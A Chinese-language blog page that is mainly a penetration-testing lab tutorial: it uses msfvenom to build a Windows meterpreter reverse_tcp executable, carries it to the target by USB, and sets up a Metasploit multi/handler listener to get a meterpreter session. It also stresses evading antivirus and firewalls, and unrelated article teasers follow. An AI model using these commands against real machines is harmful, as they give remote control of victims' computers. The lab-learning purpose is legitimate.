news 2026/6/10 1:12:00

Kali反向TCP远程控制实验全流程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Kali反向TCP远程控制实验全流程

一、实验目的

本次实验基于 Metasploit 框架,实现 Kali Linux 对 Windows 主机的反向 TCP 远程控制,掌握 payload 生成、监听配置及安全防护规避的核心操作,理解反向连接的渗透原理。

二、实验环境

攻击机:Kali(以下使用example代替kali的ip)
靶机:Windows 10/11 (需关闭防火墙、杀毒软件等防护)
工具:Metasploit Framework、U盘(用于传输 payload)

三、实验步骤

(一)生成反向TCP Payload

在 Kali 终端中执行以下命令,生成 Windows 可执行的 payload 文件:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[example] lport=5000 -f exe -o /root/payload.exe

参数说明:
-p :指定 payload 类型为 windows/meterpreter/reverse_tcp(反向 TCP 连接)
lhost :攻击机(Kali)的局域网 IP,需替换为实际地址
lport :监听端口(自定义,本次使用 5000)
f exe :生成 exe 格式可执行文件
o :指定输出路径及文件名

(二)传输 payload 到靶机

将生成的 payload.exe 通过 U 盘复制到 Windows 靶机,注意传输过程中避免被安全软件拦截。

(四)Kali 端配置监听

1. 启动 Metasploit 控制台:
msfconsole


2. 加载监听模块并配置参数:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [example]
set LPORT 5000
exploit


3. 运行 payload 建立会话,监听启动成功标志如下:


终端出现 meterpreter > 提示符,代表远程控制会话建立成功。

六、实验总结

本次实验成功实现反向 TCP 远程控制,核心在于 payload 参数匹配 和 安全防护规避。反向连接的优势在于穿透靶机防火墙(由靶机主动发起连接),这也是渗透测试中常用的方式。同时需注意,实验仅用于合法授权的学习测试,未经授权的远程控制属于违法行为。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/5 4:07:32

如何选择汽车车灯提升行车安全?

理解车灯的基本类型和功能 在选择适合我们车辆的车灯时,首先需要了解不同类型车灯以及它们各自的功能。车灯通常分为卤素灯、LED灯和氙气灯等。在我们日常行驶中,卤素灯以其低廉的成本和较易更换的特性受到许多车主欢迎。然而,这种类型的灯泡…

作者头像 李华
网站建设 2026/6/8 22:39:39

无需高端显卡!Qwen3-14B在消费级GPU上的运行实践记录

无需高端显卡!Qwen3-14B在消费级GPU上的运行实践记录 你有没有遇到过这样的场景:团队想上AI项目,模型选型定了,功能也设计好了,结果一查部署成本——光是A100/H100显卡就得几万甚至十几万起步?不少中小企业…

作者头像 李华
网站建设 2026/6/9 2:04:38

Git Commit消息编写规范助力Qwen3-VL-8B项目协作

Git Commit消息编写规范助力Qwen3-VL-8B项目协作 在AI工程化日益深入的今天,一个模型能否顺利从实验室走向生产环境,往往不取决于它的参数规模或准确率指标,而在于背后支撑它的那套可维护、可追溯、可持续迭代的开发体系。以轻量级多模态模型…

作者头像 李华
网站建设 2026/6/9 2:35:32

Java 泛型深度解析:从原理到实战应用与常见问题

一、引言:为什么泛型是 Java 类型安全的 “守护者”?在 Java 5 之前,开发者使用集合(如ArrayList、HashMap)时,面临一个严重的问题:集合无法限制存储元素的类型。例如,一个ArrayList…

作者头像 李华
网站建设 2026/6/8 9:55:46

从零开始部署Qwen3-14B:GPU算力需求与Token成本优化建议

从零开始部署 Qwen3-14B:GPU 算力与 Token 成本优化实战指南 在企业 AI 落地的浪潮中,一个现实问题反复浮现:如何在有限预算下运行足够强大的大模型?很多团队曾尝试直接调用公有云 API,却发现随着请求量上升&#xff0…

作者头像 李华